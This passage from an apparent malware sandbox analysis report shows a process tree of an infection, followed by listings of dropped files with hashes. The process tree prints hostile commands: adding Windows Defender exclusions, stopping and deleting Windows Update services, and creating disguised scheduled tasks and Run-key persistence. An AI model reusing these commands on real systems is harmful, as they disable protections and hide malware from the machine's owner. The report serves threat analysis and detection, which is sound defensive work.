                                                    "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4456
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                      6⤵
                                                      • Creates scheduled task(s)
                                                      PID:4492
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        7⤵
                                                          PID:868
                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                      5⤵
                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                      • Drops file in Drivers directory
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Drops file in Program Files directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1004
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 236
                                                  3⤵
                                                  • Program crash
                                                  PID:4436
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 240
                                                  3⤵
                                                  • Program crash
                                                  PID:3156
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 280
                                                  3⤵
                                                  • Program crash
                                                  PID:3912
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4420
                                              • C:\Windows\System32\cmd.exe
                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                2⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:3356
                                                • C:\Windows\System32\sc.exe
                                                  sc stop UsoSvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:1960
                                                • C:\Windows\System32\sc.exe
                                                  sc stop WaaSMedicSvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2928
                                                • C:\Windows\System32\sc.exe
                                                  sc stop wuauserv
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:3832
                                                • C:\Windows\System32\sc.exe
                                                  sc stop bits
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:1008
                                                • C:\Windows\System32\sc.exe
                                                  sc stop dosvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2120
                                                • C:\Windows\System32\reg.exe
                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                  3⤵
                                                    PID:1572
                                                  • C:\Windows\System32\reg.exe
                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                    3⤵
                                                      PID:4444
                                                    • C:\Windows\System32\reg.exe
                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                      3⤵
                                                      • Modifies security service
                                                      PID:1640
                                                    • C:\Windows\System32\reg.exe
                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                      3⤵
                                                        PID:4800
                                                      • C:\Windows\System32\reg.exe
                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                        3⤵
                                                          PID:4856
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:868
                                                      • C:\Windows\System32\dialer.exe
                                                        C:\Windows\System32\dialer.exe
                                                        2⤵
                                                          PID:756
                                                      • C:\Windows\system32\DllHost.exe
                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                        1⤵
                                                          PID:3384
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 3384 -s 148
                                                            2⤵
                                                            • Program crash
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2412
                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          1⤵
                                                            PID:3552
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                            1⤵
                                                              PID:3188
                                                            • C:\Windows\system32\DllHost.exe
                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                              1⤵
                                                                PID:4264
                                                                • C:\Windows\system32\WerFault.exe
                                                                  C:\Windows\system32\WerFault.exe -u -p 4264 -s 356
                                                                  2⤵
                                                                  • Program crash
                                                                  • Checks processor information in registry
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:396
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                1⤵
                                                                  PID:2256
                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                  1⤵
                                                                    PID:3992
                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                    C:\Windows\system32\wbem\wmiprvse.exe
                                                                    1⤵
                                                                      PID:644
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                      1⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:700
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                      1⤵
                                                                        PID:4772
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                        1⤵
                                                                          PID:4504
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                          1⤵
                                                                            PID:4244
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                            1⤵
                                                                              PID:4216
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              1⤵
                                                                                PID:5112
                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                1⤵
                                                                                  PID:4680
                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3796
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                    1⤵
                                                                                      PID:2460
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                      1⤵
                                                                                        PID:1884
                                                                                      • C:\Windows\System32\spoolsv.exe
                                                                                        C:\Windows\System32\spoolsv.exe
                                                                                        1⤵
                                                                                          PID:1672
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                          1⤵
                                                                                            PID:2016
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                            1⤵
                                                                                              PID:1976
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                              1⤵
                                                                                                PID:1924
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                                1⤵
                                                                                                  PID:1916
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                  1⤵
                                                                                                    PID:1792
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                    1⤵
                                                                                                      PID:1692
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                      1⤵
                                                                                                        PID:1680
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                        1⤵
                                                                                                          PID:1616
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                          1⤵
                                                                                                            PID:1608
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                            1⤵
                                                                                                              PID:1500
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                              1⤵
                                                                                                                PID:1468
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                1⤵
                                                                                                                  PID:1384
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                                  1⤵
                                                                                                                    PID:1368
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                                    1⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    PID:1228
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                    1⤵
                                                                                                                      PID:1212
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                      1⤵
                                                                                                                        PID:1040
                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                        1⤵
                                                                                                                          PID:424
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                          1⤵
                                                                                                                            PID:752
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                            1⤵
                                                                                                                              PID:952
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                              PID:860
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2472 -ip 2472
                                                                                                                                2⤵
                                                                                                                                  PID:1484
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2472 -ip 2472
                                                                                                                                  2⤵
                                                                                                                                    PID:1520
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2472 -ip 2472
                                                                                                                                    2⤵
                                                                                                                                      PID:1176
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2356 -ip 2356
                                                                                                                                      2⤵
                                                                                                                                        PID:1260
                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 452 -p 4264 -ip 4264
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                        PID:1292
                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 516 -p 3384 -ip 3384
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                        PID:3000
                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 628 -p 2140 -ip 2140
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                        PID:2084
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                      1⤵
                                                                                                                                        PID:4224
                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                        1⤵
                                                                                                                                          PID:2140
                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 2140 -s 744
                                                                                                                                            2⤵
                                                                                                                                            • Program crash
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            PID:3092

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER3197.tmp.csv

                                                                                                                                          Filesize

                                                                                                                                          35KB

                                                                                                                                          MD5

                                                                                                                                          0d8d3fdd80c3b946ba3f738761ce479a

                                                                                                                                          SHA1

                                                                                                                                          f1397565001780bfd06766974cab673e335824dc

                                                                                                                                          SHA256

                                                                                                                                          d33a6a917e7d138d5d718aefe7e5ee23d7040d7d67989d0c3a8a20c915d1f839

                                                                                                                                          SHA512

                                                                                                                                          3c9f6fbb195e41459c05fe47e4c5f1c4fca150259d42e144fb448369ba95e7410aa92e5fe5cb5cd961aca863057a7174d2700d8ab3c32644e7c4bfd0566bb67e

                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER31B7.tmp.txt

                                                                                                                                          Filesize

                                                                                                                                          13KB

                                                                                                                                          MD5

                                                                                                                                          23e2879cb328898e5c2b56789de781cf

                                                                                                                                          SHA1

                                                                                                                                          daf4bba39085eff0d799337ba6f1b70178de1682

                                                                                                                                          SHA256

                                                                                                                                          c9d1c20565ed57f95dd6f664afc724c4f6f5f16b4212c85fffd38bc7daac38e1

                                                                                                                                          SHA512

                                                                                                                                          c4c0ba242be32781ac82947c040b29dcb994dbb9858c999610ed430384766942b2fd042e277e0e8b6c19873e2ae709b51e1d13a0f81aa98593827d4484716c74

                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEC6.tmp.csv

                                                                                                                                          Filesize

                                                                                                                                          38KB

                                                                                                                                          MD5

                                                                                                                                          afe6bc2daab4557ecf49b08723141801

                                                                                                                                          SHA1

                                                                                                                                          81f62e8e973c5a6bec14aeaba483e4f01e7417b0

                                                                                                                                          SHA256

                                                                                                                                          3a7dfcfee6b5cb55ce12514e2385e7fcb5130ae33d53802cd45232afda00ecb9

                                                                                                                                          SHA512

                                                                                                                                          fa8c674dfc50f65280976b4bb01ee0d182cfdb2d5ba80053d258d84c7e25fa3a1e632bdf2c76415ea24da2bcfed9e200e94383aefba3bb26ad25a4073e010c58

                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF06.tmp.txt

                                                                                                                                          Filesize

                                                                                                                                          13KB

                                                                                                                                          MD5

                                                                                                                                          b0b787a2d5cf69e5bfa42d61d21fe143

                                                                                                                                          SHA1

                                                                                                                                          540cac982a6c6eb14ae9e1fb918af1ce3f20a8e1

                                                                                                                                          SHA256

                                                                                                                                          b20092675608bc220aaa4f4d6d317822d9a0671179cb55584445c325c6c9a28a

                                                                                                                                          SHA512

                                                                                                                                          0cb4a74a5dd1d9d5fadcaf97cbd7fd37802c891ada6201c3e127ffc648eb2f58e7e782a5b70064219b5c6bd4a1e3d308eff7be93f4857685cb9c7f2584651f18

                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF84.tmp.csv

                                                                                                                                          Filesize

                                                                                                                                          37KB

                                                                                                                                          MD5

                                                                                                                                          620677a5b9588cdb93ceefd7e503bee3

                                                                                                                                          SHA1

                                                                                                                                          bcd0c72d8f9f1674d5674636ae1a99b87b4a983c

                                                                                                                                          SHA256

                                                                                                                                          1092751b31944c01e8be9b6c28b7ce24789748b30be7e53fbfef6cec3086b4ba

                                                                                                                                          SHA512

                                                                                                                                          fb0a570a387e3d8b9d6182ccd4f6be45bb571dc93f69c4ba80a52f61687834caa5122c26e61340f71880afd02411f7ee4e97ffdbc4558d611113a62d7a92de8a

                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFC3.tmp.txt

                                                                                                                                          Filesize

                                                                                                                                          13KB

                                                                                                                                          MD5

                                                                                                                                          39fcdeeb5356c2435670103c55f58400

                                                                                                                                          SHA1

                                                                                                                                          40481e9421be62a42a2df0efad45454ee91672f9

                                                                                                                                          SHA256

                                                                                                                                          d1ffddce74ae11c131b6f22e81cfc12e9e2aa7ef0e6f6a4d739642e96a5b86c4

                                                                                                                                          SHA512

                                                                                                                                          68928b906fa6ed7d72937c0cf9ce8695e377a48b7202b83115c8ee155f5675c368d188833e9a55cac959848dac14fee8689c9b305e3af1f502b6ea1cbb2a872b

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                          SHA1

                                                                                                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                          SHA256

                                                                                                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                          SHA512

                                                                                                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                          Filesize

                                                                                                                                          19KB

                                                                                                                                          MD5

                                                                                                                                          9558e9e398cec571714b3a223642a822

                                                                                                                                          SHA1

                                                                                                                                          363343c729fb0654c6dc0e8fa85bc938bece7b0e

                                                                                                                                          SHA256

                                                                                                                                          56b19c25663142395287bef80eb7f2e8dc85c96c7101422e0c02972b133c0faa

                                                                                                                                          SHA512

                                                                                                                                          cc92f68582ae03b59f9d3de6652d8a061772c562458ab233b786fd5a6fd7b190daa7659406694f1e496b80bbc605bca64f091ea9ed3913f1a9bd85718fdefa2d

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                          Filesize

                                                                                                                                          948B

                                                                                                                                          MD5

                                                                                                                                          a7ce8cefc3f798abe5abd683d0ef26dd

                                                                                                                                          SHA1

                                                                                                                                          b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

                                                                                                                                          SHA256

                                                                                                                                          5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

                                                                                                                                          SHA512

                                                                                                                                          c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                                                                                                          Filesize

                                                                                                                                          1.4MB

                                                                                                                                          MD5

                                                                                                                                          bb86a343080f9f4696c250ef31a18d9d

                                                                                                                                          SHA1

                                                                                                                                          43b2193dcb1d56eac73ba88a7b461822074192d6

                                                                                                                                          SHA256

                                                                                                                                          095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                                                                                                          SHA512

                                                                                                                                          24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                                                                                                          Filesize

                                                                                                                                          1.4MB

                                                                                                                                          MD5

                                                                                                                                          bb86a343080f9f4696c250ef31a18d9d

                                                                                                                                          SHA1

                                                                                                                                          43b2193dcb1d56eac73ba88a7b461822074192d6

                                                                                                                                          SHA256

                                                                                                                                          095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                                                                                                          SHA512

                                                                                                                                          24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                                                                                                          Filesize

                                                                                                                                          3.7MB

                                                                                                                                          MD5

                                                                                                                                          f5c51e7760315ad0f0238d268c03c60e

                                                                                                                                          SHA1

                                                                                                                                          85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                                                                                                          SHA256

                                                                                                                                          ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                                                                                                          SHA512

                                                                                                                                          d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                                                                                                          Filesize

                                                                                                                                          3.7MB

                                                                                                                                          MD5

                                                                                                                                          f5c51e7760315ad0f0238d268c03c60e

                                                                                                                                          SHA1

                                                                                                                                          85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                                                                                                          SHA256

                                                                                                                                          ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                                                                                                          SHA512

                                                                                                                                          d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                                                                                                          Filesize

                                                                                                                                          1.4MB

                                                                                                                                          MD5

                                                                                                                                          b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                          SHA1

                                                                                                                                          f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                          SHA256

                                                                                                                                          dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                          SHA512

                                                                                                                                          1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                                                                                                          Filesize

                                                                                                                                          1.4MB

                                                                                                                                          MD5

                                                                                                                                          b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                          SHA1

                                                                                                                                          f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                          SHA256

                                                                                                                                          dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                          SHA512

                                                                                                                                          1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\new2.exe

                                                                                                                                          Filesize

                                                                                                                                          674KB

                                                                                                                                          MD5

                                                                                                                                          e479ecb1802253a4c94767c8af306baf

                                                                                                                                          SHA1

                                                                                                                                          846bb5d88b91b8aa17bdb58eaf246b10e6586402

                                                                                                                                          SHA256

                                                                                                                                          b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                                                                                                                                          SHA512

                                                                                                                                          b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\new2.exe

                                                                                                                                          Filesize

                                                                                                                                          674KB

                                                                                                                                          MD5

                                                                                                                                          e479ecb1802253a4c94767c8af306baf

                                                                                                                                          SHA1

                                                                                                                                          846bb5d88b91b8aa17bdb58eaf246b10e6586402

                                                                                                                                          SHA256

                                                                                                                                          b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                                                                                                                                          SHA512

                                                                                                                                          b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                                                                                                                                          Filesize

                                                                                                                                          1.4MB

                                                                                                                                          MD5

                                                                                                                                          b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                          SHA1

                                                                                                                                          f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                          SHA256

                                                                                                                                          dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                          SHA512

                                                                                                                                          1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

                                                                                                                                          Filesize

                                                                                                                                          1.4MB

                                                                                                                                          MD5

                                                                                                                                          b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                          SHA1

                                                                                                                                          f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                          SHA256

                                                                                                                                          dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                          SHA512

                                                                                                                                          1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                        • C:\Windows\system32\drivers\etc\hosts

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          4ac8a26e2cee1347880edccb47ab30ea

                                                                                                                                          SHA1

                                                                                                                                          a629f6d453014c9dccb98987e1f4b0a3d4bdd460

                                                                                                                                          SHA256

                                                                                                                                          de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

                                                                                                                                          SHA512

                                                                                                                                          fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

                                                                                                                                        • memory/212-361-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/396-291-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/424-280-0x0000020D8D570000-0x0000020D8D597000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          156KB

